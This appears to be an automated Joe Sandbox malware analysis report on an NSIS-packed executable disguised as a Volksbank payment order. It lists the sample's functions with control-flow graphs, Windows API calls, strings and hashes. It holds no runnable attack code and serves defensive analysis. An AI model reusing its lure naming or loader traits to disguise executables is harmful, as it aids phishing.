                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                                                                          • String ID: ... %d%%
                                                                                                                                                                                                                                          • API String ID: 551687249-2449383134
                                                                                                                                                                                                                                          • Opcode ID: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
                                                                                                                                                                                                                                          • Instruction ID: 4304c27296c3acdf0d2a87061290089073c1970791b1d07264e817265a7bbb17
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C516C31801219EBCB10DF65DA45A9F7BA8AF45766F1442BFE810B72C0C7788F51CBA9
                                                                                                                                                                                                                                          Function 00405792 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 596 405792-4057dd CreateDirectoryW 597 4057e3-4057f0 GetLastError 596->597 598 4057df-4057e1 596->598 599 40580a-40580c 597->599 600 4057f2-405806 SetFileSecurityW 597->600 598->599 600->598 601 405808 GetLastError 600->601 601->599
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057D5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004057E9
                                                                                                                                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057FE
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405808
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                          • API String ID: 3449924974-3370423016
                                                                                                                                                                                                                                          • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                                                                                                                          • Instruction ID: 488e367ac99084f0472557c0a26963b348c4b9c4a011ef6404f7c6369f031e52
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03011A71C00619DADF009FA1C9447EFBBB4EF14354F00803AD945B6281D7789618CFE9
                                                                                                                                                                                                                                          Function 00405D80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 602 405d80-405d8c 603 405d8d-405dc1 GetTickCount GetTempFileNameW 602->603 604 405dd0-405dd2 603->604 605 405dc3-405dc5 603->605 607 405dca-405dcd 604->607 605->603 606 405dc7 605->606 606->607
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405D9E
                                                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",0040334E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76943420,0040359C), ref: 00405DB9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • nsa, xrefs: 00405D8D
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D85, 00405D89
                                                                                                                                                                                                                                          • "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe", xrefs: 00405D80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                          • API String ID: 1716503409-2822682656
                                                                                                                                                                                                                                          • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                                                                          • Instruction ID: 49388a817ab8929663d32c184486222aab3b5007cea287540e7d96a1fedb5290
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56F01D76600304FBEB009F69DD09E9BBBA9EF95750F11807BE900A6290E6B099548B64
                                                                                                                                                                                                                                          Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 608 10001759-10001795 call 10001b18 612 100018a6-100018a8 608->612 613 1000179b-1000179f 608->613 614 100017a1-100017a7 call 10002286 613->614 615 100017a8-100017b5 call 100022d0 613->615 614->615 620 100017e5-100017ec 615->620 621 100017b7-100017bc 615->621 622 1000180c-10001810 620->622 623 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 620->623 624 100017d7-100017da 621->624 625 100017be-100017bf 621->625 626 10001812-1000184c call 100015b4 call 100024a4 622->626 627 1000184e-10001854 call 100024a4 622->627 648 10001855-10001859 623->648 624->620 628 100017dc-100017dd call 10002b57 624->628 630 100017c1-100017c2 625->630 631 100017c7-100017c8 call 1000289c 625->631 626->648 627->648 642 100017e2 628->642 637 100017c4-100017c5 630->637 638 100017cf-100017d5 call 10002640 630->638 639 100017cd 631->639 637->620 637->631 647 100017e4 638->647 639->642 642->647 647->620 652 10001896-1000189d 648->652 653 1000185b-10001869 call 10002467 648->653 652->612 655 1000189f-100018a0 GlobalFree 652->655 658 10001881-10001888 653->658 659 1000186b-1000186e 653->659 655->612 658->652 661 1000188a-10001895 call 1000153d 658->661 659->658 660 10001870-10001878 659->660 660->658 662 1000187a-1000187b FreeLibrary 660->662 661->652 662->658
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                                                                                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,8BC3C95B), ref: 100022B8
                                                                                                                                                                                                                                            • Part of subcall function 10002640: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                                                                                                                                                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1791698881-3916222277
                                                                                                                                                                                                                                          • Opcode ID: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
                                                                                                                                                                                                                                          • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                                                                                                                                                                                                          Function 00405C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 669 405c38-405c53 call 40625f call 405bdb 674 405c55-405c57 669->674 675 405c59-405c66 call 4064f3 669->675 676 405cb1-405cb3 674->676 679 405c76-405c7a 675->679 680 405c68-405c6e 675->680 681 405c90-405c99 lstrlenW 679->681 680->674 682 405c70-405c74 680->682 683 405c9b-405caf call 405b30 GetFileAttributesW 681->683 684 405c7c-405c83 call 4065a2 681->684 682->674 682->679 683->676 689 405c85-405c88 684->689 690 405c8a-405c8b call 405b7c 684->690 689->674 689->690 690->681
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,?,0000000A), ref: 0040626C
                                                                                                                                                                                                                                            • Part of subcall function 00405BDB: CharNextW.USER32(?,?,fareafvrgende\Djrve27.gud,?,00405C4F,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,76943420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76943420,00000000), ref: 00405BE9
                                                                                                                                                                                                                                            • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
                                                                                                                                                                                                                                            • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(fareafvrgende\Djrve27.gud,00000000,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,76943420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76943420,00000000), ref: 00405C91
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,00000000,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,76943420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76943420), ref: 00405CA1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                          • String ID: fareafvrgende\Djrve27.gud
                                                                                                                                                                                                                                          • API String ID: 3248276644-3469630132
                                                                                                                                                                                                                                          • Opcode ID: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
                                                                                                                                                                                                                                          • Instruction ID: 07588a96ba491492048338639ced47dd8f75e02a3aa2c86f807570fea5ede87b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF0D125008F1115E72233361D49EAF2664CE96360B1A023FF952B12D1DB3C99939C6E
                                                                                                                                                                                                                                          Function 0040612D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 692 40612d-40615f call 4060cc 695 406161-40618f RegQueryValueExW RegCloseKey 692->695 696 40619d 692->696 695->696 697 406191-406195 695->697 698 4061a1-4061a3 696->698 697->698 699 406197-40619b 697->699 699->696 699->698
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063A1,80000002), ref: 00406173
                                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,004063A1,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 0040617E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                                                                          • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                                          • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                                                                                                                                          • Instruction ID: 844fa4e459781eb8e351c6656b051d01f86af1f9d8b6039d3a5e8c643dc5dfc4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1015A72500209EAEF218F51CD0AEDB3BA8EF54360F01803AF91AA6191D778D964CBA4
                                                                                                                                                                                                                                          Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnumErrorLastWindows
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 14984897-0
                                                                                                                                                                                                                                          • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                                                                                                                                                          • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                                                                                                                                                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
